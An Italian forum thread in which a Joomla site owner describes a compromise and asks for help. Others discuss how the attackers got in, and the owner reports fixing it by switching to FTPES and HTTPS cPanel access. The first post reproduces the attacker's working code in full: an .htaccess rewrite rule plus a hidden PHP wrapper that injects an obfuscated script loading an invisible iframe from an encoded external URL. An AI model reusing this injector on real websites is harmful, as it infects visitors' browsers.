Hacker sul mio sito Joomla 1.15.14

[nibiru]

Ciao a tutti,
             mi è capitata una cosa molto strana:
Il 5 settembre il mio sito joomla prima dell'attacco era così composto:
joomla 1.15.9
community builder 1.2

Poi sono entrati e mi hanno attivato e scritto l'.htaccess con questi parametri:

Codice: [Seleziona]

#mmmmd

RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]

dove mi hanno creato nella root il file

.heder.php.php

<?php

$frame_code = '<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';



function get_file_dir_($file) {

    global $argv;

    $dir = dirname(getcwd() . '/' . $file);

    $curDir = getcwd();

    chdir($dir);

    $dir = getcwd();

    chdir($curDir);

    return $dir;

}



function callback($data)

{

global $frame_code;

if(preg_match("/(<.*?body.*?>)/i", $data) > 0)

return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);

else return $data.$frame_code;

}



ob_start('callback');

$file = $_GET['qq'];

chdir(get_file_dir_($file));



include($file);
?>
Inoltre mi hanno messo un iframe nella index.html tanto che una volta che scarico il file index.html sul pc AVG mi dice che è un virus /html .
Hanno pure modificato la cartella xmlrpc inserendoci sempre lo stesso .htaccess e .heder.php.php.

Praticamente quando provo ad accedere alla home ho pagina bianca e la parte di administrator sempre pagina bianca.

Ho ripristinato un backup , ho aggiornato alla versione 1.15.14 stabile , ho cambiato tutte le pwd admin /FTP / mysql veramente complesse.

Ma purtroppo oggi ritrovo lo stesso problema pagina bianca , l'hosting serverplan mi dice che il problema è il mio di aggiornamento di joomla ma più di così non so cosa fare, come fanno ad entrare nel mio spazio e fare tutto questo?

[56francesco]

nibiru se proprio necessario utilizza il tag code per quelle righe..

anche se non serve diffondere ulteriormente certi codici..

ho visto che citi un file index.html utilizzavi una intro per caso?
potrebbe essere quella la porta di accesso,
hai un link al sito? 

[nibiru]

Il codice penso sia di aiuto ad altri dato che su google ne ho trovati molti infetti comunque ora ho ripristinato il bk prima dell'attacco sperando che non lo riattaccano cmq il link è www.andrealedaro.com non utilizzo intro ma 2 template.

[krikykk]

capitato un attacco simile anche a me con la versione 1.0 , hanno preso le pass di tutto .. compresi grdegli altri siti che erano ospitati sull'hosting ...
capita ogni tanto . ..
ma una cosa che non riesco a capire sul tuo sito

perche la home page fa una chiamata di com_login
controlla bene che l'errore e la" porta aperta agli inturi " forse sta qui .

[nibiru]

Ho dovuto impostare la home che fa una chiamata di login perchè altrimenti gli utenti quando si loggano mi entrano nella home anzichè nel pagina di mio interesse.
Comunque confermo anche a me che mi hanno bucato in maniera simile tutti i siti joomla sia 1.15.14 che 1.0 che avevo sull'hosting di Serverplan quindi ora vi chiedo se riescono a sniffare la pwd di Cpanel il problema è di joomla o è un problema di sicurezza dei server di Serverplan? Alla fine krikykk come hai risolto?
Grazie

[maicolstaip]

Ciao,
mi è capitato lo stesso problema di nibiru su un hosting condiviso ed escluderei sia un problema di joomla perchè hanno infettato con lo stesso sistema anche un sito in html    ed uno in wordpress.
Ora sto cambiando tutte le credenziali ma :
- o hanno sniffato la mia pass dell'ftp ed allora hanno avuto accesso a tutti i siti
- o la sicurezza del server è scadente?
- o cosa?

[nibiru]

Risolto il grave problema, praticamente sniffavano completamente le pwd dell'FTP/Cpanel di tutti i miei siti presenti su l'hosting di serverplan ,per risolvere il problema abbiamo attivato l'FTPES su tutti i miei siti e ho dovuto utilizzare cpanel con l'https.
Grazie